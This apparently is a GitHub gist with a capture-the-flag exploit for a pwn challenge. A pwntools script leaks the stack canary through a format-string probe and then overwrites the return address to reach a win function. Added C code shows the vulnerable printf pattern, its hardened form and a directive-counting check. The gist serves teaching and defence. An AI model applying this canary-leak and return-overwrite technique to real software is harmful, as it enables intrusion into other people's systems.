@luckythandel
Created September 6, 2021 07:49
grabCONCTF2021 - pwn - `Can You?`
```python
#!/usr/bin/env python3
from pwn import *

context.arch = 'i386'

'''
The binary has a format string vulnerability, so it is easy to leak the stack
cookie value, place it back at its proper position in the payload, and then
overwrite the return pointer without failing the stack check.
'''

canary_format_str = "%31$p"   # format string that prints the stack slot holding the canary
win = p32(0x08049236)         # address of the win function

io = process('./cancancan')

# canary leak
io.recvuntil(b'can you bypass me???')
io.sendline(canary_format_str.encode())
canary = int(io.recv().decode().strip(), 16)  # parse the leaked "0x..." value instead of eval()'ing untrusted output
log.info("Canary: {}".format(hex(canary)))

# return pointer overwrite
offset = 116          # return pointer is 116 bytes away from the input buffer
canary_offset = 100   # the stack canary sits 100 bytes into the buffer
padding = b"A" * canary_offset
payload = padding + p32(canary)  # put the leaked canary back at its position so the stack check does not fail
payload = payload + b"A" * (offset - len(payload)) + win
io.sendline(payload)
io.interactive()
```
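The leak the script relies on comes from the classic bug class of passing untrusted input as a printf-family format string. The following C is an added example, not code from the gist or from the challenge binary: it shows the vulnerable pattern beside its hardened form, plus a small directive counter a defender can use to flag suspicious input in validation or log review. The function names, the buffer size and the counter are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

#define OUT_LEN 64  /* constructed buffer size for this example */

/* Vulnerable pattern: untrusted input is used as the format string.
 * Any '%' directive in `input` is interpreted, so a probe such as "%31$p"
 * makes the printf family read a stack slot and print it, which is how the
 * canary is leaked above. Calling this with directive-bearing input is
 * undefined behaviour; the demo only feeds it plain text. The pragmas
 * silence the very warning (-Wformat-security) that should be an error
 * in production builds. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"
int echo_unsafe(const char *input, char *out, size_t out_len) {
    return snprintf(out, out_len, input);
}
#pragma GCC diagnostic pop

/* Hardened form: the format string is a constant and the input is an
 * argument, so any '%' in the input is emitted literally. */
int echo_safe(const char *input, char *out, size_t out_len) {
    return snprintf(out, out_len, "%s", input);
}

/* Defensive check: count '%' characters that are not the literal escape
 * "%%". A non-zero count in a field that should never carry directives is
 * a cheap signal for input validation or for reviewing captured input. */
int count_format_directives(const char *s) {
    int n = 0;
    for (size_t i = 0; s[i] != '\0'; i++) {
        if (s[i] == '%') {
            if (s[i + 1] == '%') { i++; continue; }  /* "%%" prints a literal percent */
            n++;
        }
    }
    return n;
}

int main(void) {
    char out[OUT_LEN];
    const char *leak_probe = "%31$p";  /* the probe used in the gist */

    echo_safe(leak_probe, out, sizeof out);
    printf("safe echo of %s -> %s\n", leak_probe, out);
    printf("directives in probe: %d\n", count_format_directives(leak_probe));

    echo_unsafe("hello", out, sizeof out);  /* harmless: no directives in the input */
    printf("unsafe echo of plain text -> %s\n", out);
    return 0;
}
```

Compile with `gcc -Wall -Wformat -Wformat-security` to see the warning on `echo_unsafe` once the pragmas are removed; treating it as an error (`-Werror=format-security`) is the usual way to keep this pattern out of a code base.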